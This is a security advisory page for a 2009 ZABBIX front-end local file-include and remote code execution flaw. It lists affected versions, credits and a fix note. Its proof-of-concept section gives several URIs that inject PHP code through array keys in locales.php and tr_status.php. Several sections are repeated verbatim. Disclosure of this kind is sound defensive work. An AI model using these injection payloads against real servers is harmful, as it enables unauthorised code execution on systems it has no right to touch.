ZABBIX 'locales.php' Local File Include and Remote Code Execution Vulnerability
BID:33965
Info
ZABBIX 'locales.php' Local File Include and Remote Code Execution Vulnerability
| Bugtraq ID: | 33965 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 03 2009 12:00AM |
| Updated: | Mar 09 2009 03:36PM |
| Credit: | Antonio 's4tan' Parata, Francesco 'ascii' Ongaro and Giovanni 'evilaliv3' Pellerano |
| Vulnerable: |
ZABBIX ZABBIX 1.6.2 ZABBIX ZABBIX 1.4.3 ZABBIX ZABBIX 1.4.2 |
| Not Vulnerable: |
ZABBIX ZABBIX 1.6.3 |
Discussion
ZABBIX 'locales.php' Local File Include and Remote Code Execution Vulnerability
ZABBIX is prone to multiple local file-include vulnerabilities and a remote code-execution vulnerability that occur in the front-end web interface.
Attackers can exploit these issues to execute arbitrary code within the context of the webserver or obtain sensitive information. Other attacks are also possible.
ZABBIX 1.6.2 is vulnerable; prior versions may also be affected.
ZABBIX is prone to multiple local file-include vulnerabilities and a remote code-execution vulnerability that occur in the front-end web interface.
Attackers can exploit these issues to execute arbitrary code within the context of the webserver or obtain sensitive information. Other attacks are also possible.
ZABBIX 1.6.2 is vulnerable; prior versions may also be affected.
Exploit / POC
ZABBIX 'locales.php' Local File Include and Remote Code Execution Vulnerability
Attackers can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/locales.php?download&langTo&extlang[".phpinfo()."]=1
http://www.example.com/tr_status.php?compact=false&onlytrue=true&noactions=true&select=false&txt_select=&sort[%22.phpinfo().%22]=1
http://www.example.com/tr_status.php?compact=false&onlytrue=true&noactions=true&select=false&txt_select=&sort%5B%22.phpinfo%28%29.%22%5D=1
http://www.example.com/tr_status.php?compact=false&onlytrue=true&noactions=true&select=false&txt_select=&sort%5B%22.phpinfo%28%29.%22%5D=1
Attackers can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/locales.php?download&langTo&extlang[".phpinfo()."]=1
http://www.example.com/tr_status.php?compact=false&onlytrue=true&noactions=true&select=false&txt_select=&sort[%22.phpinfo().%22]=1
http://www.example.com/tr_status.php?compact=false&onlytrue=true&noactions=true&select=false&txt_select=&sort%5B%22.phpinfo%28%29.%22%5D=1
http://www.example.com/tr_status.php?compact=false&onlytrue=true&noactions=true&select=false&txt_select=&sort%5B%22.phpinfo%28%29.%22%5D=1
Solution / Fix
ZABBIX 'locales.php' Local File Include and Remote Code Execution Vulnerability
Solution:
Reports indicate that these issues have been fixed. Please see the references for more information.
Solution:
Reports indicate that these issues have been fixed. Please see the references for more information.
References
ZABBIX 'locales.php' Local File Include and Remote Code Execution Vulnerability
References:
References:
- ZABBIX Homepage (ZABBIX)
- Re: Zabbix 1.6.2 Frontend Multiple Vulnerabilities (Eygene Ryabinkin
) - Zabbix 1.6.2 Frontend Multiple Vulnerabilities (ascii
)